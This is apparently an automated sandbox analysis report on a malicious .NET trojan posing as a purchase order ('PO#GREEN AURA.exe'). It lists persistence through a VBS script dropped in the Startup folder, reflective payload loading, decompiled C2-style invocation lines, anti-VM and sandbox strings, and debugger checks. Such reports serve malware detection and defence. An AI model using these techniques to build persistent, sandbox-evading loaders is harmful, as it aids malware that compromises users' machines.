Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: Count.exe.0.dr, Oqvdlucx.cs	Suspicious method names: .Oqvdlucx.FetchPayloadAsync
Source: 0.2.PO#GREEN AURA.exe.43314f0.5.raw.unpack, Oqvdlucx.cs	Suspicious method names: .Oqvdlucx.FetchPayloadAsync
Source: PO#GREEN AURA.exe, Oqvdlucx.cs	Suspicious method names: .Oqvdlucx.FetchPayloadAsync

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@4/3@1/1

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Mutant created: \Sessions\1\BaseNamedObjects\QIUpnGyi0OFuIMGO
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:64:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3c61c146-366c-49e1-a958-ef322e048864

Jump to behavior

Source: PO#GREEN AURA.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO#GREEN AURA.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PO#GREEN AURA.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

File read: C:\Users\user\Desktop\PO#GREEN AURA.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO#GREEN AURA.exe "C:\Users\user\Desktop\PO#GREEN AURA.exe"
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process created: C:\Users\user\Desktop\PO#GREEN AURA.exe "C:\Users\user\Desktop\PO#GREEN AURA.exe"
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 928
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process created: C:\Users\user\Desktop\PO#GREEN AURA.exe "C:\Users\user\Desktop\PO#GREEN AURA.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PO#GREEN AURA.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO#GREEN AURA.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\System.pdbF source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\PO#GREEN AURA.PDBs source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO#GREEN AURA.exe, 00000000.00000002.1843788679.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\PO#GREEN AURA.PDB source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO#GREEN AURA.exe, 00000000.00000002.1843788679.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: n,C:\Windows\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbh source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: PO#GREEN AURA.exe, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: PO#GREEN AURA.exe, Zytiu.cs	.Net Code: Dfwsqzgkcr System.AppDomain.Load(byte[])
Source: Count.exe.0.dr, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: Count.exe.0.dr, Zytiu.cs	.Net Code: Dfwsqzgkcr System.AppDomain.Load(byte[])
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.PO#GREEN AURA.exe.43314f0.5.raw.unpack, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO#GREEN AURA.exe.43314f0.5.raw.unpack, Zytiu.cs	.Net Code: Dfwsqzgkcr System.AppDomain.Load(byte[])
Source: 0.2.PO#GREEN AURA.exe.6e90000.10.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.PO#GREEN AURA.exe.6e90000.10.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.PO#GREEN AURA.exe.6e90000.10.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.PO#GREEN AURA.exe.6e90000.10.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.PO#GREEN AURA.exe.6e90000.10.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.PO#GREEN AURA.exe.6580000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO#GREEN AURA.exe.6580000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1842730771.0000000006580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO#GREEN AURA.exe PID: 2136, type: MEMORYSTR

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06EEE448 push es; retf	0_2_06EEE494
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06EECFD1 push es; iretd	0_2_06EECFD4
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06EE4C72 push eax; ret	0_2_06EE4C79
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06EE4C70 pushad ; ret	0_2_06EE4C71
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F85CF1 push es; ret	0_2_06F85D0C
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F882C6 push es; retf	0_2_06F8831C
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F89A71 push es; ret	0_2_06F89A8C
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F83B98 pushfd ; retf	0_2_06F83B99
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F8D0FA push eax; retf	0_2_06F8D0FD
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F84078 push eax; iretd	0_2_06F84079

Source: 0.2.PO#GREEN AURA.exe.6220000.7.raw.unpack, A9TAnnCsDAfU3Hj52mH.cs

High entropy of concatenated method names: 'LBHCkeyLc7', 'JQACRr1y27', 'mTvCj67Ehp', 've8CUsCXoT', 'iYSC96h8wL', 'mDPCoVvi61', 'LyxC0bHwYk', 'bt6CAceDKX', 'MP8COM5KJl', 'O63CMlpyX8'

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

File created: C:\Users\user\AppData\Roaming\Count.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PO#GREEN AURA.exe PID: 2136, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Memory allocated: 1950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Memory allocated: 3320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Memory allocated: 5320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Memory allocated: CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Memory allocated: 28C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Memory allocated: 27D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: PO#GREEN AURA.exe, 00000000.00000002.1828695571.000000000160D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, NativeMethods.cs	Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, ResourceReferenceValue.cs	Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

Process created: C:\Users\user\Desktop\PO#GREEN AURA.exe "C:\Users\user\Desktop\PO#GREEN AURA.exe"

Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Queries volume information: C:\Users\user\Desktop\PO#GREEN AURA.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
